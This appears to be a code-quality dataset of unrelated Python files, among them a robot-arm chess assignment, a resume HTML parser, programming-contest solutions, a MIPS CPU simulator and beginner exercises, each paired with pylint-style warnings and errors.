20 self.hpedestal = 1.082 # di riser/zed in meters
21 self.pedestal_offset = 0.0675 # ai riser/zed
22 self.wpedestal = 0.1 # just leave it 0.1
23
24 # Dimensions upper arm
25 self.upper_length = 0.2535 # ai shoulder in meters
26 self.upper_height = 0.095 # di shoulder in meters
27
28 # Dimensions lower arm
29 self.lower_length = 0.2535 # ai elbow in meters
30 self.lower_height = 0.080 # di elbow in meters
31
32 # Dimensions wrist
33 self.wrist_height = 0.09 # di wrist in meters
34
35 # Height of the arm from the very top of the riser, to the tip of the gripper.
36 self.total_arm_height = self.pedestal_offset + self.upper_height \
37 + self.lower_height + self.wrist_height
38
39 # Joint-ranges in meters (where applicable e.g. Riser, Gripper) and in degrees for the rest.
40
41 ## TODO for students: REPLACE MINIMUM_DEGREES AND MAXIMUM_DEGREES FOR EACH INDIVIDUAL JOINT, THEY ARE NOT THE SAME FOR
42 # SHOULDER, ELBOW, AND WRIST
43 self.joint_ranges = {
44 "Riser" : [0.0, 0.925],
45 "Shoulder" : [-90.0, 90.0],
46 "Elbow" : [-180.0, 110.0],
47 "Wrist" : [-110.0, 110.0],
48 "Gripper" : [0, 0.05]
49 }
50
51 def correct_height(self, y):
52 '''
53         Function that corrects the y value of the umi-rtx, because the real arm runs
54 from -self.hpedestal/2 to self.hpedestal/2, while y runs from 0 to self.hpedestal.
55 '''
56 return y - 0.5*self.hpedestal
| 41 - warning: fixme
16 - refactor: too-many-instance-attributes
16 - refactor: too-few-public-methods
|
1 # ZSB - Opdracht 2 #
2 # errorreport.py #
3 # 16/06/2017 #
4 # #
5 # Anna Stalknecht - 10792872 #
6 # Claartje Barkhof - 11035129 #
7 # Group C #
8 # #
9 ################################
10
11 '''
12 error report
13 We started implementing the board_position_to_cartesian function. This function was
14 tested by printing the cartesian values to see if they matched our calculations.
15 We also printed the board_position and the value of the index function to see if it was working
16 correctly.
17
18 Then we implemented the high_path function which we tested by running the program and
19 pressing compute high path. We then checked the joints_simulation.txt file and saw that
20 something had changed. We couldn't really test it more because we first had to implement
21 the inverse_kinematics.
22
23 So we made the inverse_kinematics function. And now we had the possibility to test it by
24 running the program. At first the program wasn't working properly because it took chesspieces
25 from the table instead of from the chessboard. We found out that it was because we switched x
26 and z axes.
27
28 Then we tried rotating the chessboard and we found out that our board_position_to_cartesian wasn't
29 working properly. It was only working when we turned the chessboard 0 or 180 degrees. That was because
30 we walked from h8 at the given angle, but it didn't work the way we wanted. Then we changed
31 the function so it would calculate the cartesian position from the original angle (0 degrees), and then
32 convert that position to the new position at the given angle. Then it worked.
33
34 We then had an error rotating the chessboard -20 degrees: the shoulder_angle gave a math error.
35 That was because the arms are not long enough to reach the top of the board at that angle.
36 When we placed the board closer to the gripper, our program worked properly again.
37
38
39 ''' | Clean Code: No Issues Detected
|
1 import json
2 import pymongo
3 from bs4 import BeautifulSoup
4 client = pymongo.MongoClient("mongodb+srv://localhost")
5 db = client.test
6 col = db["resumes"]
7 documents = col.find({},no_cursor_timeout=True) # if limit not necessary then discard limit
8 print(type(documents))
9 new_col = db["resultResumes"]
10 for i in documents:
11 dict = {}
12 doc = i["Resume-Html"]
13 soup = BeautifulSoup(''.join(doc),features="html.parser")
14 dict['_id'] = i['_id']
15 dict['createdTime'] = i['createdTime']
16 dict['Title'] = i['Title']
17 location = soup.find('p', attrs={'class' : 'locality'})
18 if location is not None:
19 loc = location.get_text()
20 locspace = " ".join(loc.split())
21 dict['Location'] = locspace
22 else:
23 dict['Location'] = ""
24 education = soup.find('div',attrs={'class':'section-item education-content'})
25 if education is not None:
26 edu= education.get_text()
27 eduspace = " ".join(edu.split())
28 edurem = eduspace.replace('Education', '')
29 dict['Education'] = edurem
30 else:
31 dict['Education'] = ""
32
33 workexperience = soup.find('div', attrs={'class':'section-item workExperience-content'})
34 if workexperience is not None:
35 # print(workexperience.get_text())
36 bza = []
37 abcd = soup.findAll('div', attrs={'class': 'work-experience-section'})
38 k = 0
39 for j in range(len(abcd)):
40
41 print('---------------------------------------------------')
42 print(j)
43 worka = abcd[j].find('p', attrs={'class': 'work_title'})
44 if worka is not None:
45 workaa = worka.get_text()
46 workspa = " ".join(workaa.split())
47 workb = abcd[j].find('div', attrs={'class': 'work_company'})
48 if workb is not None:
49 workba = workb.get_text()
50 workspb = " ".join(workba.split())
51 workc = abcd[j].find('p', attrs={'class': 'work_dates'})
52 if workc is not None:
53 workca = workc.get_text()
54 workspc = " ".join(workca.split())
55 workd = abcd[j].find('p', attrs={'class': 'work_description'})
56 if workd is not None:
57 workda = workd.get_text()
58 workspd = " ".join(workda.split())
59 vskp = workspa + workspb + workspc + workspd
60
61 # vskp.append(wora)
62 # vskp.append(worb)
63 # vskp.append(worc)
64 # vskp.append(word)
65
66 bza.append(vskp)
67
68
69 print('---------------------------------------------------')
70 print(bza)
71
72 dict['WorkExperience'] = bza
73 else:
74 dict['WorkExperience'] = ""
75 currentcompany = soup.find('div', attrs={'class':'work_company'})
76 if currentcompany is not None:
77 company= currentcompany.get_text()
78 companyspace = " ".join(company.split())
79 dict['CurrentCompany'] = companyspace
80 else:
81 dict['CurrentCompany'] = ""
82 skills = soup.find('div', attrs={'class':'data_display'})
83 if skills is not None:
84 skill= skills.get_text()
85 skillspace = " ".join(skill.split())
86 skillarr = []
87 skillarr.append(skillspace)
88 dict['Skills'] = skillarr
89 else:
90 dict['Skills'] = ""
91 introduction = soup.find('p', attrs={'class' : 'summary'})
92 if introduction is not None:
93 introduction = introduction.get_text()
94 introductionspace = " ".join(introduction.split())
95 dict['Introduction'] = introductionspace
96 else:
97 dict['Introduction'] = ""
98
99
100 new_col.insert_one(dict)
| 11 - warning: redefined-builtin
59 - error: possibly-used-before-assignment
59 - error: possibly-used-before-assignment
59 - error: possibly-used-before-assignment
59 - error: possibly-used-before-assignment
1 - warning: unused-import
|
1 """
2 # Speaking in Tongues
3
4 ## Problem
5
6 We have come up with the best possible language here at Google, called Googlerese. To translate text into
7 Googlerese, we take any message and replace each English letter with another English letter. This mapping
8 is one-to-one and onto, which means that the same input letter always gets replaced with the same output
9 letter, and different input letters always get replaced with different output letters. A letter may be
10 replaced by itself. Spaces are left as-is.
11
12 For example (and here is a hint!), our awesome translation algorithm includes the following three mappings:
13 'a' -> 'y', 'o' -> 'e', and 'z' -> 'q'. This means that "a zoo" will become "y qee".
14
15 Googlerese is based on the best possible replacement mapping, and we will never change it. It will always be
16 the same. In every test case. We will not tell you the rest of our mapping because that would make the problem
17 too easy, but there are a few examples below that may help.
18
19 Given some text in Googlerese, can you translate it to back to normal text?
20
21 Solving this problem
22
23 Usually, Google Code Jam problems have 1 Small input and 1 Large input. This problem has only 1 Small input.
24 Once you have solved the Small input, you have finished solving this problem.
25
26 ### Input
27
28 The first line of the input gives the number of test cases, T. T test cases follow, one per line.
29
30 Each line consists of a string G in Googlerese, made up of one or more words containing the letters 'a' - 'z'.
31 There will be exactly one space (' ') character between consecutive words and no spaces at the beginning or at
32 the end of any line.
33
34 ### Output
35
36 For each test case, output one line containing "Case #X: S" where X is the case number and S is the string that
37 becomes G in Googlerese.
38
39 ### Limits
40
41 1 <= T <= 30.
42 G contains at most 100 characters.
43 None of the text is guaranteed to be valid English.
44
45 ### Sample
46
47 Input
48 3
49 ejp mysljylc kd kxveddknmc re jsicpdrysi
50 rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd
51 de kr kd eoya kw aej tysr re ujdr lkgc jv
52
53 Output
54 Case #1: our language is impossible to understand
55 Case #2: there are twenty six factorial possibilities
56 Case #3: so it is okay if you want to just give up
57
58 """
59
60 import string, urllib
61
62 input = 'https://raw.github.com/gist/2404633/65abea31f1a9504903f343e762d007d95ef0540a/GoogleCodeJam-SpeakingInTongues.txt'
63 decoded = string.maketrans('ynficwlbkuomxsevzpdrjgthaq', 'abcdefghijklmnopqrstuvwxyz')
64 getdata = urllib.urlopen(input).read().split('\n')[1:]
65
66 for i, j in enumerate(getdata):
67 print "Case #%d: %s" % (i+1, j.translate(decoded))
68
| 67 - error: syntax-error
|
1 def isPrime(n):
2 import re
3 return re.match(r'^1?$|^(11+?)\1+$', '1' * n) == None
| Clean Code: No Issues Detected
|
1 def mapper(function, *params):
2 rez = []
3 for args in zip(*params):
4 rez.append(function(*args))
5 return rez
6
7 print mapper(abs, [-3, 5, -1, 42, 23])
8 print mapper(pow, [1, 2, 3], [2, 3, 4, 5]) | 7 - error: syntax-error
|
1 import subprocess
2
3 def shell(command, stdout=True):
4 if stdout:
5 return subprocess.check_output(command, shell=True)
6 return subprocess.check_call(command, shell=True)
7
8 print shell('ls')
| 8 - error: syntax-error
|
1 print [x % 3/2 * 'Fizz' + x % 5/4 * 'Buzz' or x + 1 for x in range(100)]
| 1 - error: syntax-error
|
1 def fibonacci(n):
2 if n == 0:
3 return (0, 1)
4 else:
5 a, b = fibonacci(n/2)
6 c = a*(2*b - a)
7 d = b*b + a*a
8 return (c, d) if n%2 == 0 else (d, c+d)
9
10 print fibonacci(100000)[0] | 10 - error: syntax-error
|
1 # Run this script and enter 3 numbers separated by space
2 # example input '5 5 5'
3 a,b,c=map(int,raw_input().split())
4 for i in range(b+c+1):print(' '*(c-i)+((' /|'[(i>c)+(i>0)]+'_'*4)*(a+1))[:-4]+('|'*(b+c-i))[:b]+'/')[:5*a+c+1]
| 3 - error: undefined-variable
4 - warning: expression-not-assigned
|
1 class DictObject(dict):
2
3 def __getattr__(self, k):
4 return self[k]
5
6 def __setattr__(self, k, v):
7 return self[k]
8
9
10 obj = DictObject({'key' : 'value'})
11 print obj.key
| 11 - error: syntax-error
|
1 newlist = sorted(arr, key=lambda k: k['keyName'])
2
3 import operator
4 newlist = sorted(arr, key=operator.itemgetter('keyName'))
| 1 - error: undefined-variable
4 - error: undefined-variable
|
1 import functools
2
3 def my_check(func):
4
5 @functools.wraps(func)
6 def decorated_view(*args, **kwargs):
7 if 1 != 2:
8 return 'failure'
9 return func(*args, **kwargs)
10
11 return decorated_view
12
13
14 if __namae__ == '__main__':
15
16 @my_check
17 def hello():
18 return 'success'
| 5 - warning: bad-indentation
6 - warning: bad-indentation
7 - warning: bad-indentation
8 - warning: bad-indentation
9 - warning: bad-indentation
11 - warning: bad-indentation
16 - warning: bad-indentation
17 - warning: bad-indentation
18 - warning: bad-indentation
7 - refactor: comparison-of-constants
14 - error: undefined-variable
|
1 def genPrimes(n):
2 n, correction = n - n%6 + 6, 2 - (n % 6 > 1)
3 sieve = [True] * (n/3)
4 for i in xrange(1, int(n**0.5) / 3 + 1):
5 if sieve[i]:
6 k = 3*i+1|1
7 sieve[k*k/3 ::2*k] = [False] * ((n/6 - k*k/6-1) / k+1)
8 sieve[k*(k-2*(i&1) + 4)/3 :: 2*k] = [False] * ((n/6 - k*(k-2*(i&1)+4)/6-1) / k+1)
9
10 return [2,3] + [3*i+1|1 for i in xrange(1,n/3-correction) if sieve[i]]
11
12 print genPrimes(10000) | 12 - error: syntax-error
|
1 def stringPermutations(string):
2 rez = []
3
4 if len(string) < 2:
5 rez.append(string)
6 else:
7 for position in range(len(string)):
8 perms = string[:position] + string[position+1:]
9 for i in stringPermutations(perms):
10 rez.append(string[position:position+1] + i)
11
12 return rez
13
14 print stringPermutations('abc') # ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']
| 14 - error: syntax-error
|
1 '''
2 Facebook Hacker Cup 2012 Qualification Round
3
4 Alphabet Soup
5 Alfredo Spaghetti really likes soup, especially when it contains alphabet pasta. Every day he constructs
6 a sentence from letters, places the letters into a bowl of broth and enjoys delicious alphabet soup.
7
8 Today, after constructing the sentence, Alfredo remembered that the Facebook Hacker Cup starts today!
9 Thus, he decided to construct the phrase "HACKERCUP". As he already added the letters to the broth,
10 he is stuck with the letters he originally selected. Help Alfredo determine how many times he can place
11 the word "HACKERCUP" side-by-side using the letters in his soup.
12
13 Input
14 The first line of the input file contains a single integer T: the number of test cases. T lines follow,
15 each representing a single test case with a sequence of upper-case letters and spaces: the original
16 sentence Alfredo constructed.
17
18 Output
19 Output T lines, one for each test case. For each case, output "Case #t: n", where t is the test case
20 number (starting from 1) and n is the number of times the word "HACKERCUP" can be placed side-by-side
21 using the letters from the sentence.
22
23 Constraints
24 1 < T <= 20
25 Sentences contain only the upper-case letters A-Z and the space character
26 Each sentence contains at least one letter, and contains at most 1000 characters, including spaces
27 '''
28
29 import urllib
30 def parse(string):
31 d = {'H' : 0, 'A' : 0, 'C' : 0, 'K' : 0, 'E' : 0, 'R' : 0, 'U' : 0, 'P' : 0}
32 d.update({s: string.count(s) for s in string if s in d})
33 d['C'] /= 2
34 return min(d.values())
35
36 file = urllib.urlopen("https://raw.github.com/gist/1651354/67521ff0ac3332ca68713dfcd474a431c2d6c427/AlphabetSoupInput.txt").read().split('\n')
37 open('output.txt', 'w').write( "\n".join( [("Case #%d: %d" % (i, parse(file[i]))) for i in range(1, len(file))]))
| 31 - warning: bad-indentation
32 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
36 - error: no-member
37 - refactor: consider-using-with
37 - warning: unspecified-encoding
|
1 def stringCombinations(string, right = ''):
2 if not string:
3 print right
4 return
5
6 stringCombinations(string[1:], string[0] + right)
7 stringCombinations(string[1:], right)
8
9 stringCombinations('abcd')
| 3 - error: syntax-error
|
1 """
2 Beautiful Strings
3
4 When John was a little kid he didn't have much to do. There was no internet, no Facebook,
5 and no programs to hack on. So he did the only thing he could... he evaluated the beauty
6 of strings in a quest to discover the most beautiful string in the world.
7
8 Given a string s, little Johnny defined the beauty of the string as the sum of the beauty
9 of the letters in it.
10
11 The beauty of each letter is an integer between 1 and 26, inclusive, and no two letters
12 have the same beauty. Johnny doesn't care about whether letters are uppercase or lowercase,
13 so that doesn't affect the beauty of a letter.
14 (Uppercase 'F' is exactly as beautiful as lowercase 'f', for example.)
15
16 You're a student writing a report on the youth of this famous hacker. You found the string
17 that Johnny considered most beautiful. What is the maximum possible beauty of this string?
18
19
20 Input
21 The input file consists of a single integer m followed by m lines.
22
23 Output
24 Your output should consist of, for each test case, a line containing the string "Case #x: y"
25 where x is the case number (with 1 being the first case in the input file, 2 being the second, etc.)
26 and y is the maximum beauty for that test case.
27
28 Constraints
29 5 <= m <= 50
30 2 <= length of s <= 500
31
32
33 Example input Example output
34
35 5
36 ABbCcc Case #1: 152
37 Good luck in the Facebook Hacker Cup this year! Case #2: 754
38 Ignore punctuation, please :) Case #3: 491
39 Sometimes test cases are hard to make up. Case #4: 729
40 So I just go consult Professor Dalves Case #5: 646
41
42 """
43
44 import re, operator, urllib2
45
46
47 def getScore(s):
48 s = re.sub('[^A-Za-z]', '', s).lower()
49 total, x, d = 0, 26, {}
50 d.update({j: s.count(j) for j in s})
51 data = sorted(d.iteritems(), key=operator.itemgetter(1))[::-1]
52
53 for i in data:
54 total += i[1] * x
55 x -= 1
56
57 return total
58
59
60 file = urllib2.urlopen('https://gist.github.com/raw/4647356/f490a1df2ccda25553c70086205e38fc7e53647e/FBHackerCupBeautifulStrings.txt').read().split('\n')
61 open('output.txt', 'w').write( "\n".join( [("Case #%d: %d" % (i, getScore(file[i]))) for i in range(1, len(file))][:-1]))
62
| 51 - error: no-member
61 - refactor: consider-using-with
61 - warning: unspecified-encoding
|
1 def eratosthenes_sieve(n):
2 candidates = list(range(n+1))
3 fin = int(n**0.5)
4
5 for i in xrange(2, fin+1):
6 if candidates[i]:
7 candidates[2*i::i] = [None] * (n//i - 1)
8
9 return [i for i in candidates[2:] if i] | 5 - error: undefined-variable
|
1 def qsort(list):
2 return [] if list==[] else qsort([x for x in list[1:] if x < list[0]]) + [list[0]] + qsort([x for x in list[1:] if x >= list[0]])
| 1 - warning: redefined-builtin
|
1 def multiply(x, y):
2 if x.bit_length() <= 1536 or y.bit_length() <= 1536:
3 return x * y;
4 else:
5 n = max(x.bit_length(), y.bit_length())
6 half = (n + 32) / 64 * 32
7 mask = (1 << half) - 1
8 xlow = x & mask
9 ylow = y & mask
10 xhigh = x >> half
11 yhigh = y >> half
12
13 a = multiply(xhigh, yhigh)
14 b = multiply(xlow + xhigh, ylow + yhigh)
15 c = multiply(xlow, ylow)
16 d = b - a - c
17
18 return (((a << half) + d) << half) + c | 3 - warning: unnecessary-semicolon
2 - refactor: no-else-return
|
1 array = ['duck', 'duck', 'goose']
2 print max(set(array), key=array.count)
| 2 - error: syntax-error
|
1 def powerset(array):
2 ps = [[]]
3 for i in array:
4 ps += [x + [array[i]] for x in ps]
5 return ps
6
7 print powerset([0, 1, 2, 3])
| 7 - error: syntax-error
|
1 def lengthOfNumber(n):
2 from math import log10, floor
3 return int(floor(log10(n)+1))
4
5 print lengthOfNumber(12321) # should give 5
| 5 - error: syntax-error
|
1 NO_STUDENTS = "There are no students for this teacher"
2
3
4 class Person(object):
5 def __init__(self, name):
6 self.name = name
7
8 def __str__(self):
9 return "My name is %s" % self.name
10
11
12 class Student(Person):
13 def __init__(self, name, group):
14 super(Student, self).__init__(name)
15 self.group = group
16
17 def __str__(self):
18 return "My name is %s and I'm from %s group" % (self.name, self.group)
19
20 def print_group(self):
21 return "My group is %s" % self.group
22
23
24 class Teacher(Person):
25 def __init__(self, name):
26 super(Teacher, self).__init__(name)
27 self.students = []
28
29 def add_student(self, student):
30 self.students.append(student)
31
32 def remove_student(self, student):
33 for current_student in self.students:
34 if student.name == current_student.name:
35 self.students.remove(current_student)
36
37 def __str__(self):
38 return "My name is %s and my students are:\n%s" % (self.name, self.get_all_students())
39
40 def get_all_students(self):
41 if self.students:
42 return "\n".join("%s" % st for st in self.students)
43 else:
44 return NO_STUDENTS
45
46
47 if __name__ == "__main__":
48 alice_student = Student("Alice", "12")
49 bob_student = Student("Bob", "12")
50 alex_teacher = Teacher("Alex")
51 assert alex_teacher.get_all_students() == NO_STUDENTS
52 alex_teacher.add_student(alice_student)
53 assert alex_teacher.get_all_students() == "%s" % alice_student
54 alex_teacher.add_student(bob_student)
55 print(alex_teacher)
56 alex_teacher.remove_student(alice_student)
57 assert alex_teacher.get_all_students() == "%s" % bob_student
| 4 - refactor: useless-object-inheritance
4 - refactor: too-few-public-methods
14 - refactor: super-with-arguments
26 - refactor: super-with-arguments
41 - refactor: no-else-return
|
1 #long: ** is a special character; this actually means 2 to the power of 123
2 MijnBankRekeningNummer = 2**123
3
4 #char
5 char VoorletterNaam = 'r' | 5 - error: syntax-error
|
1 #python only has float
2 ditIsEenfloat = 0.2422
3
4 #decimal
5 hoeveelKidsHebJe = decimal('1.31') | 5 - error: undefined-variable
|
1 #int
2 hoeveelKopjesSuiker = 2
3
4 #bool
5 IsDezePersoonMijnMatch = false
6 IsDezePersoonMijnMatch = true
7
8 #string
9 spreekwoord = "De kat op het spek binden"
10
| 5 - error: undefined-variable
6 - error: undefined-variable
|
1 def to_integer(binary_number):
2 if not isinstance(binary_number, str):
3 raise Exception()
4
5 return int(binary_number, 2)
6
7
8 def to_binary(number):
9 if not isinstance(number, int):
10 raise Exception()
11
12 return "{:0b}".format(number)
13
14
15 def extend_to_bits(binary_number, bits = 32):
16 if not isinstance(binary_number, str):
17 return None
18
19 number_length = len(binary_number)
20
21 result = bits - number_length
22
23 zero_fill = "0" * result
24
25 return "{}{}".format(zero_fill, binary_number)
26
27
28 def to_binaryC2(number, bits = 32):
29 if not isinstance(number, int):
30 raise Exception()
31
32 if number >= 0 :
33 number = to_binary(number)
34 number = extend_to_bits(number, bits)
35 return number
36 else:
37 number = 2**bits + number
38 number = to_binary(number)
39 number = extend_to_bits(number, bits)
40 return number
41
42
43 def to_decimalC2(binary_number):
44 if not isinstance(binary_number, str):
45 return None
46
47 bits = len(binary_number)
48
49 decimal = int(binary_number, 2)
50
51 if binary_number[0] == '0':
52 return decimal
53 else:
54 decimal = - (2**bits) + decimal
55 return decimal | 3 - warning: broad-exception-raised
10 - warning: broad-exception-raised
30 - warning: broad-exception-raised
32 - refactor: no-else-return
51 - refactor: no-else-return
|
1 from utils import (
2 extend_to_bits,
3 to_binary,
4 to_integer,
5 to_binaryC2,
6 to_decimalC2
7 )
8
9
10 class ALU:
11
12 def makeSum(self, a, b):
13
14 result = to_decimalC2(a) + to_decimalC2(b)
15
16 if result > (2**31 -1) or result < -(2**31):
17 print("{}OVERFLOW OCURRENCE{}".format("-" * 20, "-" * 7))
18
19 result = to_binaryC2(result)
20 return result
21
22 def makeSub(self, a, b):
23
24 result = to_decimalC2(a) - to_decimalC2(b)
25
26 if result > (2**31 -1) or result < -(2**31):
27 print("{}OVERFLOW OCURRENCE".format("-" * 26))
28
29 result = to_binaryC2(result)
30
31 return result
32
33 def makeAnd(self, a, b):
34
35 a = int(a, 2)
36 b = int(b, 2)
37
38 result = to_binary((a & b))
39
40 return extend_to_bits(result)
41
42 def makeOr(self, a, b):
43
44 a = int(a, 2)
45 b = int(b, 2)
46
47 result = to_binary((a | b))
48
49 return extend_to_bits(result)
50
51 def makeNot(self, a):
52 a_len = len(a)
53
54 a = to_decimalC2(a)
55
56 result = to_binaryC2(~a, a_len)
57
58 return result
| 1 - warning: unused-import
|
1 # Instructions that the program recognizes
2 FUNCTIONS = {
3 '101011': 'sw',
4 '100011': 'lw',
5 '100000': 'add',
6 '100010': 'sub',
7 '100101': 'or',
8 '100100': 'and'
9 }
| Clean Code: No Issues Detected
|
1 from memory import RegistersBank, Memory
2 from logic import ALU
3 from instructions import PC
4 from control import (
5 ControlSw,
6 ControlLw,
7 ControlAdd,
8 ControlSub,
9 ControlAnd,
10 ControlOr,
11 )
12
13
14 class CPU:
15 def __init__(self):
16 self.alu = ALU()
17 self.pc = PC()
18 self.registers = RegistersBank()
19 self.memory = Memory()
20 self.control_types = {
21 'add': ControlAdd(self),
22 'sub': ControlSub(self),
23 'and': ControlAnd(self),
24 'or': ControlOr(self),
25 'lw': ControlLw(self),
26 'sw': ControlSw(self)
27 }
28
29 def execute(self):
30 for instruction in self.pc.get_instructions():
31 instruction_func = instruction.get_func()
32
33 self.control_types[instruction_func].execute()
| 14 - refactor: too-few-public-methods
|
1 from core import CPU
2
3
4 if __name__ == "__main__":
5 cpu = CPU()
6 cpu.execute()
| Clean Code: No Issues Detected
|
1 import random
2 from utils import to_binary, extend_to_bits, to_binaryC2
3
4
5 class BaseMemory:
6
7 def __init__(self):
8 self.data = {}
9
10 def set_value(self, address, value):
11 """
12 Set a value with a given address
13 """
14
15 self.data[address] = value
16
17 return True
18
19 def get_value(self, address):
20 """
21 Return a value with a given address
22 """
23
24 return self.data[address]
25
26
27 class RegistersBank(BaseMemory):
28 data = {}
29
30 def __new__(cls, *args, **kwargs):
31 """
32 Make the BaseMemory a Monostate class
33 """
34 obj = super(RegistersBank, cls).__new__(cls, *args, **kwargs)
35 obj.__dict__ = cls.data
36
37 return obj
38
39 def __init__(self):
40 total_registers = 2**5
41
42 for i in range(total_registers):
43 binary_number = to_binary(i)
44 if len(binary_number) < 5:
45 zero_fill = 5 - len(binary_number)
46 binary_number = "{}{}".format(
47 "0" * zero_fill,
48 binary_number
49 )
50
51 if i == 8:
52 self.data[binary_number] = extend_to_bits(to_binary(16))
53 else:
54 self.data[binary_number] = False
55
56
57 class Memory(BaseMemory):
58 data = {}
59
60 def __new__(cls, *args, **kwargs):
61 """
62 Make the BaseMemory a Monostate class
63 """
64 obj = super(Memory, cls).__new__(cls, *args, **kwargs)
65 obj.__dict__ = cls.data
66
67 return obj
68
69 def __init__(self):
70 total_data = 2**8
71
72 for i in range(total_data):
73 binary_number = to_binary(i)
74 binary_number = extend_to_bits(to_binary(i))
75
76 random_number = to_binaryC2(
77 random.randint(-(2**31), (2**31) - 1)
78 )
79 self.data[binary_number] = random_number
80
| 39 - warning: super-init-not-called
69 - warning: super-init-not-called
|
1 from li import FUNCTIONS
2 from utils import extend_to_bits
3
4 class MipsInstruction:
5 op = None
6 rs = None
7 rt = None
8 rd = None
9 shamt = None
10 func = None
11 offset = None
12 instruction_type = None
13 instruction = None
14
15 def __init__(self, instruction):
16 if not (isinstance(instruction, str) or len(instruction) == 32):
17 raise Exception()
18
19 self.instruction = instruction.replace('\n', '')
20 self.op = self.instruction[:6]
21
22 if self.op == '000000':
23 self._configure_to_registers()
24 else:
25 self._configure_to_imediate()
26
27 def _configure_to_imediate(self):
28 self.instruction_type = 'I'
29 self.rs = self.instruction[6:11]
30 self.rt = self.instruction[11:16]
31 self.offset = self.instruction[16:32]
32
33 return self.instruction
34
35 def _configure_to_registers(self):
36 self.instruction_type = 'R'
37 self.rs = self.instruction[6:11]
38 self.rt = self.instruction[11:16]
39 self.rd = self.instruction[16:21]
40 self.shamt = self.instruction[21:26]
41 self.func = self.instruction[26:32]
42
43 return self.instruction
44
45 def has_offset(self):
46 if self.instruction_type == 'R':
47 return False
48
49 return True
50
51 def get_type(self):
52 return self.instruction_type
53
54 def get_function(self):
55 return self.func
56
57 def get_registers(self):
58 registers = {
59 'rs': self.rs,
60 'rt': self.rt,
61 'rd': self.rd
62 }
63 return registers
64
65 def get_offset(self):
66 if not self.has_offset():
67 return None
68
69 return extend_to_bits(self.offset)
70
71 def get_func(self):
72 if self.op != '000000':
73 return FUNCTIONS[self.op]
74
75 return FUNCTIONS[self.func]
76
77 def __repr__(self):
78 representation = "-" * 64
79 representation += \
80 "\nInstruction: {}\nType: {}\nOperation: {}\n".format(
81 self.instruction,
82 self.instruction_type,
83 self.get_func()
84 )
85
86 representation += "-" * 64
87
88 return representation
89
90
91 class PC:
92 def __init__(self, filename="instructions_file.txt"):
93 self.file = open(filename, 'r')
94 self.next_instruction = None
95
96 def get_instructions(self):
97 """
98 Return a mips instruction object
99 for each instruction in the file
100 """
101
102 for instruction in self.file.readlines():
103 if self.next_instruction:
104 self.next_instruction = MipsInstruction(instruction)
105 else:
106 self.next_instruction = MipsInstruction(instruction)
107
108 yield self.next_instruction
| 28 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
31 - warning: bad-indentation
33 - warning: bad-indentation
36 - warning: bad-indentation
37 - warning: bad-indentation
38 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
41 - warning: bad-indentation
43 - warning: bad-indentation
4 - refactor: too-many-instance-attributes
17 - warning: broad-exception-raised
93 - warning: unspecified-encoding
93 - refactor: consider-using-with
91 - refactor: too-few-public-methods
|
1 from django.urls import path
2 from . import views
3
4
5 urlpatterns = [
6 path('traider', views.traider,name='traider'),
7 path('add_traid', views.add_traid,name='add_traid'),
8 path('compleat_traid', views.compleat_traid,name='compleat_traid'),
9 path('get_user_info', views.print_convertion,name='get_user_info'),
10 path('convertion', views.print_convertion,name='convertion'),
11 path('print_user', views.print_user,name='print_user'),
12 path('doit', views.doit,name='doit')
13
14 ]
15 #print_user
16
| 2 - error: no-name-in-module
|
1 import requests
2 r = requests.get('http://127.0.0.1:8080/number?number=1')
3 #print(r.status_code)
4 #print(r.text)
5 if "One" in r.text:
6 print("Passed Test")
7 else:
8 print("Failed Test")
9
10 if "Ok" in r.text:
11 print("Passed Test")
12 else:
13 print("Failed Test")
14
15
16 r = requests.get('http://127.0.0.1:8080/number?number=8')
17 #print(r.status_code)
18 #print(r.text)
19 if "Eight" in r.text:
20 print("Passed Test")
21 else:
22 print("Failed Test")
23
24
25
26 r = requests.get('http://127.0.0.1:8080/number?number=5A')
27 #print(r.status_code)
28 #print(r.text)
29 if "Five" in r.text:
30 print("Failed Test")
31 else:
32 print("Passed Test")
33
34 if "NAN" in r.text:
35 print("Passed Test")
36 else:
37 print("Failed Test")
38
39
40 r = requests.get('http://127.0.0.1:8080/number?number=')
41 #print(r.status_code)
42 #print(r.text)
43 if "NAN" in r.text:
44 print("Passed Test")
45 else:
46 print("Failed Test")
47
48
49 r = requests.get('http://127.0.0.1:8080/number?number=1000000000000000000000000000')
50 #print(r.status_code)
51 #print(r.text)
52 if "NTL" in r.text:
53 print("Passed Test")
54 else:
55 print("Failed Test")
56
57 r = requests.get('http://127.0.0.1:8080/number')
58 print(r.status_code)
59 print(r.text)
60 if "NAN" in r.text:
61 print("Passed Test")
62 else:
63 print("Failed Test")
64
65 r = requests.get('http://127.0.0.1:8080/number',data = {'number': '1'})
66
67 print(r.status_code)
68 print(r.text)
69 if "NAN" in r.text:
70 print("Passed Test")
71 else:
72 print("Failed Test")
| 2 - warning: missing-timeout
16 - warning: missing-timeout
26 - warning: missing-timeout
40 - warning: missing-timeout
49 - warning: missing-timeout
57 - warning: missing-timeout
65 - warning: missing-timeout
|
1 age = 20
2 name = 'zhuly'
3 print('{0} was {1} years old'.format(name, age))
| Clean Code: No Issues Detected
|
1
2 def sayhello():
3     print('hello world,hello python!')
4
5 __version__='0.1'
| Clean Code: No Issues Detected
|
1 def func(a, b=5, c=10):
2 print('a=', a, ' b=', b, ' c=', c)
3
4
5 func(2, 7)
6 func(2, c=23)
7 func(c=23,a=9)
| Clean Code: No Issues Detected
|
1 number = 23
2 while True:
3
4     guess = int(input('Please enter an integer: '))
5 if guess == number:
6         print('Congratulations, you guessed it.')
7 break
8 elif guess < number:
9         print('Your guess is too low')
10 else:
11         print('Your guess is too high')
12
13 print('end')
| 5 - refactor: no-else-break
|
1 poem = '''\
2 When the work is done
3 Programming is fun
4 If you want to make your work fun
5 use Python!
6 '''
7
8 f = open('poem.txt', 'w')
9 f.write(poem)
10 f.close()
11
12 f = open('poem.txt', 'r')
13
14 while(True):
15 line = f.readline()
16 if len(line) == 0:
17 break
18 print(line, end='')
19 f.close()
| 8 - warning: unspecified-encoding
8 - refactor: consider-using-with
12 - warning: unspecified-encoding
12 - refactor: consider-using-with
|
1 def sayHello():
2 print('hello world,hello python!')
3
4 sayHello() | Clean Code: No Issues Detected
|
1
2 def reverse(text):
3 return text[::-1]
4
5
6 def is_palindrome(text):
7 return text == reverse(text)
8
9
10 something=input('Enter text: ')
